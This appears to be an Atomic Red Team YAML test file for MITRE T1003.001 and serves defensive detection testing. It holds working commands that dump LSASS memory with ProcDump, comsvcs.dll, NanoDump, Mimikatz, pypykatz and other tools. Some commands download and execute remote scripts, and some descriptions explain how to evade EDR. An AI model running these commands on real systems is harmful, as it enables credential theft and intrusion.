Retrospected
433 lines
21 KiB
YAML
433 lines
21 KiB
YAML
attack_technique: T1003.001
|
||
display_name: "OS Credential Dumping: LSASS Memory"
|
||
atomic_tests:
|
||
- name: Dump LSASS.exe Memory using ProcDump
|
||
auto_generated_guid: 0be2230c-9ab3-4ac2-8826-3199b9a0ebf8
|
||
description: |
|
||
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
|
||
ProcDump.
|
||
|
||
Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp.
|
||
|
||
If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first.
|
||
supported_platforms:
|
||
- windows
|
||
input_arguments:
|
||
output_file:
|
||
description: Path where resulting dump should be placed
|
||
type: path
|
||
default: C:\Windows\Temp\lsass_dump.dmp
|
||
procdump_exe:
|
||
description: Path of Procdump executable
|
||
type: path
|
||
default: PathToAtomicsFolder\..\ExternalPayloads\procdump.exe
|
||
dependency_executor_name: powershell
|
||
dependencies:
|
||
- description: |
|
||
ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe})
|
||
prereq_command: |
|
||
if (Test-Path "#{procdump_exe}") {exit 0} else {exit 1}
|
||
get_prereq_command: |
|
||
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
|
||
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
|
||
Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\Procdump.zip"
|
||
Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\Procdump.zip" "PathToAtomicsFolder\..\ExternalPayloads\Procdump" -Force
|
||
New-Item -ItemType Directory (Split-Path "#{procdump_exe}") -Force | Out-Null
|
||
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\Procdump\Procdump.exe" "#{procdump_exe}" -Force
|
||
executor:
|
||
command: |
|
||
"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}
|
||
cleanup_command: |
|
||
del "#{output_file}" >nul 2> nul
|
||
name: command_prompt
|
||
elevation_required: true
|
||
- name: Dump LSASS.exe Memory using comsvcs.dll
|
||
auto_generated_guid: 2536dee2-12fb-459a-8c37-971844fa73be
|
||
description: |
|
||
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with a built-in dll.
|
||
|
||
Upon successful execution, you should see the following file created $env:TEMP\lsass-comsvcs.dmp.
|
||
supported_platforms:
|
||
- windows
|
||
executor:
|
||
command: |
|
||
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
|
||
cleanup_command: |
|
||
Remove-Item $env:TEMP\lsass-comsvcs.dmp -ErrorAction Ignore
|
||
name: powershell
|
||
elevation_required: true
|
||
- name: Dump LSASS.exe Memory using direct system calls and API unhooking
|
||
auto_generated_guid: 7ae7102c-a099-45c8-b985-4c7a2d05790d
|
||
description: |
|
||
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved using direct system calls and API unhooking in an effort to avoid detection.
|
||
https://github.com/outflanknl/Dumpert
|
||
https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/
|
||
Upon successful execution, you should see the following file created C:\\windows\\temp\\dumpert.dmp.
|
||
|
||
If you see a message saying \"The system cannot find the path specified.\", try using the get-prereq_commands to download the tool first.
|
||
supported_platforms:
|
||
- windows
|
||
input_arguments:
|
||
dumpert_exe:
|
||
description: Path of Dumpert executable
|
||
type: path
|
||
default: PathToAtomicsFolder\..\ExternalPayloads\Outflank-Dumpert.exe
|
||
dependency_executor_name: powershell
|
||
dependencies:
|
||
- description: |
|
||
Dumpert executable must exist on disk at specified location (#{dumpert_exe})
|
||
prereq_command: |
|
||
if (Test-Path "#{dumpert_exe}") {exit 0} else {exit 1}
|
||
get_prereq_command: |
|
||
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
|
||
New-Item -ItemType Directory (Split-Path "#{dumpert_exe}") -Force | Out-Null
|
||
Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c80c2b5b2d17a394b10/Dumpert/x64/Release/Outflank-Dumpert.exe" -OutFile "#{dumpert_exe}"
|
||
executor:
|
||
command: |
|
||
"#{dumpert_exe}"
|
||
cleanup_command: |
|
||
del C:\windows\temp\dumpert.dmp >nul 2> nul
|
||
name: command_prompt
|
||
elevation_required: true
|
||
|
||
- name: Dump LSASS.exe Memory using NanoDump
|
||
auto_generated_guid: dddd4aca-bbed-46f0-984d-e4c5971c51ea
|
||
description: |
|
||
The NanoDump tool uses syscalls and an invalid dump signature to avoid detection.
|
||
|
||
https://github.com/helpsystems/nanodump
|
||
|
||
Upon successful execution, you should find the nanondump.dmp file in the temp directory
|
||
supported_platforms:
|
||
- windows
|
||
dependency_executor_name: powershell
|
||
dependencies:
|
||
- description: |
|
||
NanoDump executable must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe)
|
||
prereq_command: |
|
||
if (Test-Path PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe) {exit 0} else {exit 1}
|
||
get_prereq_command: |
|
||
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
|
||
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
|
||
Invoke-WebRequest "https://github.com/fortra/nanodump/raw/2c0b3d5d59c56714312131de9665defb98551c27/dist/nanodump.x64.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe"
|
||
executor:
|
||
command: |
|
||
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"
|
||
cleanup_command: |
|
||
del "%temp%\nanodump.dmp" >nul 2> nul
|
||
name: command_prompt
|
||
elevation_required: true
|
||
|
||
- name: Dump LSASS.exe Memory using Windows Task Manager
|
||
auto_generated_guid: dea6c349-f1c6-44f3-87a1-1ed33a59a607
|
||
description: |
|
||
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task
|
||
Manager and administrative permissions.
|
||
supported_platforms:
|
||
- windows
|
||
executor:
|
||
steps: |
|
||
1. Open Task Manager:
|
||
On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking
|
||
on the task bar and selecting "Task Manager".
|
||
|
||
2. Select lsass.exe:
|
||
If lsass.exe is not visible, select "Show processes from all users". This will allow you to observe execution of lsass.exe
|
||
and select it for manipulation.
|
||
|
||
3. Dump lsass.exe memory:
|
||
Right-click on lsass.exe in Task Manager. Select "Create Dump File". The following dialog will show you the path to the saved file.
|
||
name: manual
|
||
- name: Offline Credential Theft With Mimikatz
|
||
auto_generated_guid: 453acf13-1dbd-47d7-b28a-172ce9228023
|
||
description: |
|
||
The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with
|
||
Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz and can be obtained using the get-prereq_commands.
|
||
supported_platforms:
|
||
- windows
|
||
input_arguments:
|
||
input_file:
|
||
description: Path of the Lsass dump
|
||
type: path
|
||
default: '%tmp%\lsass.DMP'
|
||
mimikatz_exe:
|
||
description: Path of the Mimikatz binary
|
||
type: string
|
||
default: PathToAtomicsFolder\..\ExternalPayloads\x64\mimikatz.exe
|
||
dependency_executor_name: powershell
|
||
dependencies:
|
||
- description: |
|
||
Mimikatz must exist on disk at specified location (#{mimikatz_exe})
|
||
prereq_command: |
|
||
if (Test-Path "#{mimikatz_exe}") {exit 0} else {exit 1}
|
||
get_prereq_command: |
|
||
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
|
||
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
|
||
$releases = "https://api.github.com/repos/gentilkiwi/mimikatz/releases"
|
||
$zipUrl = (Invoke-WebRequest $releases | ConvertFrom-Json)[0].assets.browser_download_url | where-object { $_.endswith(".zip") }
|
||
$basePath = Split-Path "#{mimikatz_exe}" | Split-Path
|
||
Invoke-FetchFromZip $zipUrl "x64/mimikatz.exe" $basePath
|
||
- description: |
|
||
Lsass dump must exist at specified location (#{input_file})
|
||
prereq_command: |
|
||
cmd /c "if not exist #{input_file} (exit /b 1)"
|
||
get_prereq_command: |
|
||
Write-Host "Create the lsass dump manually using the steps in the previous test (Dump LSASS.exe Memory using Windows Task Manager)"
|
||
executor:
|
||
command: |
|
||
"#{mimikatz_exe}" "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
|
||
name: command_prompt
|
||
elevation_required: true
|
||
- name: LSASS read with pypykatz
|
||
auto_generated_guid: c37bc535-5c62-4195-9cc3-0517673171d8
|
||
description: |
|
||
Parses secrets hidden in the LSASS process with python. Similar to mimikatz's sekurlsa::
|
||
|
||
Python 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test.
|
||
|
||
Successful execution of this test will display multiple usernames and passwords/hashes to the screen.
|
||
|
||
Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution.
|
||
|
||
supported_platforms:
|
||
- windows
|
||
input_arguments:
|
||
venv_path:
|
||
description: Path to the folder for the tactics venv
|
||
type: string
|
||
default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1003_001
|
||
dependency_executor_name: powershell
|
||
dependencies:
|
||
- description: |
|
||
Computer must have python 3 installed
|
||
prereq_command: |
|
||
if (Get-Command py -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
|
||
get_prereq_command: |
|
||
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
|
||
invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
|
||
Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
|
||
- description: |
|
||
Computer must have venv configured at #{venv_path}
|
||
prereq_command: |
|
||
if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit 1 }
|
||
get_prereq_command: |
|
||
py -m venv "#{venv_path}"
|
||
- description: |
|
||
pypykatz must be installed
|
||
prereq_command: |
|
||
if (Get-Command "#{venv_path}\Scripts\pypykatz" -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
|
||
get_prereq_command: |
|
||
& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir pypykatz 2>&1 | Out-Null
|
||
executor:
|
||
command: |
|
||
"#{venv_path}\Scripts\pypykatz" live lsa
|
||
cleanup_command: |
|
||
del "%temp%\nanodump.dmp" > nul 2> nul
|
||
name: command_prompt
|
||
elevation_required: true
|
||
- name: Dump LSASS.exe Memory using Out-Minidump.ps1
|
||
auto_generated_guid: 6502c8f0-b775-4dbd-9193-1298f56b6781
|
||
description: |
|
||
The memory of lsass.exe is often dumped for offline credential theft attacks. This test leverages a pure
|
||
powershell implementation that leverages the MiniDumpWriteDump Win32 API call.
|
||
Upon successful execution, you should see the following file created $env:TEMP\lsass_*.dmp.
|
||
|
||
Author of Out-Minidump: Matthew Graeber (@mattifestation)
|
||
supported_platforms:
|
||
- windows
|
||
executor:
|
||
command: |
|
||
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
|
||
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
|
||
try{ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1') -ErrorAction Stop}
|
||
catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
|
||
get-process lsass | Out-Minidump
|
||
cleanup_command: |
|
||
Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore
|
||
name: powershell
|
||
elevation_required: true
|
||
- name: Create Mini Dump of LSASS.exe using ProcDump
|
||
auto_generated_guid: 7cede33f-0acd-44ef-9774-15511300b24b
|
||
description: |
|
||
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
|
||
ProcDump. This particular method uses -mm to produce a mini dump of lsass.exe
|
||
|
||
Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp.
|
||
|
||
If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first.
|
||
supported_platforms:
|
||
- windows
|
||
input_arguments:
|
||
output_file:
|
||
description: Path where resulting dump should be placed
|
||
type: path
|
||
default: C:\Windows\Temp\lsass_dump.dmp
|
||
procdump_exe:
|
||
description: Path of Procdump executable
|
||
type: path
|
||
default: PathToAtomicsFolder\..\ExternalPayloads\procdump.exe
|
||
dependency_executor_name: powershell
|
||
dependencies:
|
||
- description: |
|
||
ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe})
|
||
prereq_command: |
|
||
if (Test-Path "#{procdump_exe}") {exit 0} else {exit 1}
|
||
get_prereq_command: |
|
||
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
|
||
Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\Procdump.zip"
|
||
Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\Procdump.zip" "PathToAtomicsFolder\..\ExternalPayloads\Procdump" -Force
|
||
New-Item -ItemType Directory (Split-Path "#{procdump_exe}") -Force | Out-Null
|
||
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\Procdump\Procdump.exe" "#{procdump_exe}" -Force
|
||
executor:
|
||
command: |
|
||
"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}
|
||
cleanup_command: |
|
||
del "#{output_file}" >nul 2> nul
|
||
name: command_prompt
|
||
elevation_required: true
|
||
- name: Powershell Mimikatz
|
||
auto_generated_guid: 66fb0bc1-3c3f-47e9-a298-550ecfefacbc
|
||
description: |
|
||
Dumps credentials from memory via Powershell by invoking a remote mimikatz script.
|
||
If Mimikatz runs successfully you will see several usernames and hashes output to the screen.
|
||
Common failures include seeing an \"access denied\" error which results when Anti-Virus blocks execution.
|
||
Or, if you try to run the test without the required administrative privileges you will see this error near the bottom of the output to the screen "ERROR kuhl_m_sekurlsa_acquireLSA"
|
||
supported_platforms:
|
||
- windows
|
||
input_arguments:
|
||
remote_script:
|
||
description: URL to a remote Mimikatz script that dumps credentials
|
||
type: url
|
||
default: https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1
|
||
executor:
|
||
command: |
|
||
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
|
||
name: powershell
|
||
elevation_required: true
|
||
- name: Dump LSASS with createdump.exe from .Net v5
|
||
auto_generated_guid: 9d0072c8-7cca-45c4-bd14-f852cfa35cf0
|
||
description: |
|
||
Use createdump executable from .NET to create an LSASS dump.
|
||
|
||
[Reference](https://twitter.com/bopin2020/status/1366400799199272960?s=20)
|
||
supported_platforms:
|
||
- windows
|
||
dependency_executor_name: powershell
|
||
dependencies:
|
||
- description: |
|
||
.Net v5 must be installed
|
||
prereq_command: |
|
||
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
|
||
if ($exePath -and (Test-Path $exePath)) {exit 0} else {exit 1}
|
||
get_prereq_command: |
|
||
winget install Microsoft.DotNet.DesktopRuntime.5 --accept-source-agreements --accept-package-agreements --silent
|
||
executor:
|
||
command: |
|
||
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
|
||
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
|
||
cleanup_command: |
|
||
Remove-Item $env:Temp\dotnet-lsass.dmp -ErrorAction Ignore
|
||
name: powershell
|
||
elevation_required: true
|
||
- name: Dump LSASS.exe using imported Microsoft DLLs
|
||
auto_generated_guid: 86fc3f40-237f-4701-b155-81c01c48d697
|
||
description: |
|
||
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by
|
||
importing built-in DLLs and calling exported functions. Xordump will re-read the resulting minidump
|
||
file and delete it immediately to avoid brittle EDR detections that signature lsass minidump files.
|
||
|
||
Upon successful execution, you should see the following file created $env:TEMP\lsass-xordump.t1003.001.dmp.
|
||
supported_platforms:
|
||
- windows
|
||
input_arguments:
|
||
xordump_exe:
|
||
description: Path to xordump
|
||
type: path
|
||
default: C:\Windows\Temp\xordump.exe
|
||
output_file:
|
||
description: Path where resulting dump should be placed
|
||
type: path
|
||
default: C:\Windows\Temp\lsass-xordump.t1003.001.dmp
|
||
dependencies:
|
||
- description: |
|
||
Computer must have xordump.exe
|
||
prereq_command: |
|
||
if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1}
|
||
get_prereq_command: |
|
||
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
|
||
Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe}
|
||
executor:
|
||
command: |
|
||
#{xordump_exe} -out #{output_file} -x 0x41
|
||
cleanup_command: |
|
||
Remove-Item #{output_file} -ErrorAction Ignore
|
||
name: powershell
|
||
elevation_required: true
|
||
- name: Dump LSASS.exe using lolbin rdrleakdiag.exe
|
||
auto_generated_guid: 47a539d1-61b9-4364-bf49-a68bc2a95ef0
|
||
description: |
|
||
The memory of lsass.exe is often dumped for offline credential theft attacks.
|
||
This can be achieved with lolbin rdrleakdiag.exe.
|
||
|
||
Upon successful execution, you should see the following files created, $env:TEMP\minidump_<PID>.dmp and $env:TEMP\results_<PID>.hlk.
|
||
supported_platforms:
|
||
- windows
|
||
executor:
|
||
command: |
|
||
if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
|
||
$binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
|
||
} elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
|
||
$binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
|
||
} else {
|
||
$binary_path = "File not found"
|
||
exit 1
|
||
}
|
||
$lsass_pid = get-process lsass |select -expand id
|
||
if (-not (Test-Path -Path"$env:TEMP\t1003.001-13-rdrleakdiag")) {New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force}
|
||
write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
|
||
& $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
|
||
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."
|
||
cleanup_command: |
|
||
Remove-Item $env:TEMP\t1003.001-13-rdrleakdiag -Recurse -Force -ErrorAction Ignore
|
||
name: powershell
|
||
elevation_required: true
|
||
- name: Dump LSASS.exe Memory through Silent Process Exit
|
||
auto_generated_guid: eb5adf16-b601-4926-bca7-dad22adffb37
|
||
description: |
|
||
WerFault.exe (Windows Error Reporting process that handles process crashes) can be abused to create a
|
||
memory dump of lsass.exe, in a directory of your choice. This method relies on a mechanism
|
||
introduced in Windows 7 called Silent Process Exit, which provides the ability to trigger
|
||
specific actions for a monitored process in one of two scenarios; either the process terminates
|
||
itself by calling ExitProcess(), or another process terminates it via the TerminateProcess() API.
|
||
The major advantage of this technique is that it does not cause lsass.exe to crash, and since
|
||
WerFault.exe is used to create file dumps all the time (not just lsass.exe), this method provides
|
||
the added advantage of going undetected. WerFault.exe is a process known for dumping every crashing process,
|
||
from an attacker standpoint this is appealing as their illicit credential extraction will
|
||
appear benign because from a defender’s viewpoint it’s within the realm of normal activity.
|
||
|
||
Upon successful execution, you should find the dump file in directory of your choice or "%temp%\SilentProcessExit" by default.
|
||
supported_platforms:
|
||
- windows
|
||
input_arguments:
|
||
output_folder:
|
||
description: Folder Path where resulting dump should be placed
|
||
type: path
|
||
default: '%temp%\SilentProcessExit'
|
||
dependency_executor_name: powershell
|
||
dependencies:
|
||
- description: |
|
||
NanoDump executable must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe)
|
||
prereq_command: |
|
||
if (Test-Path PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe) {exit 0} else {exit 1}
|
||
get_prereq_command: |
|
||
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
|
||
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
|
||
Invoke-WebRequest "https://github.com/fortra/nanodump/raw/2c0b3d5d59c56714312131de9665defb98551c27/dist/nanodump.x64.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe"
|
||
executor:
|
||
command: |
|
||
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"
|
||
cleanup_command: |
|
||
rmdir "#{output_folder}" /s /q >nul 2> nul
|
||
name: command_prompt
|
||
elevation_required: true
|